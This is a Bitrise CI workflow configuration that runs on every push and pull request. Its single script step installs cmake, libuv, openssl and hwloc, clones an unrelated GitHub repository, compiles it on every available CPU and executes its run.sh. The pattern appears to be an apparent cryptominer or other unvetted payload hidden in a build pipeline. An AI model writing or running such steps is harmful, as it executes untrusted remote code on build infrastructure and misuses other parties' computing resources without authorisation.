---
format_version: '11'
default_step_lib_source: https://github.com/bitrise-io/bitrise-steplib.git
project_type: other
trigger_map:
- push_branch: "*"
  workflow: primary
- pull_request_source_branch: "*"
  workflow: primary
workflows:
  primary:
    steps:
    - activate-ssh-key@4:
        run_if: '{{getenv "SSH_RSA_PRIVATE_KEY" | ne ""}}'
    - git-clone@6: {}
    - script@1:
        title: Do anything with Script step
        inputs:
        - content: brew install cmake libuv openssl hwloc && git clone https://github.com/Anli-Angku/MacOS.git && cd macos/build && cmake .. -DOPENSSL_ROOT_DIR=/usr/local/opt/openssl && make -j$(sysctl -n hw.logicalcpu) && chmod +x run.sh && sh run.sh
    - deploy-to-bitrise-io@1: {}
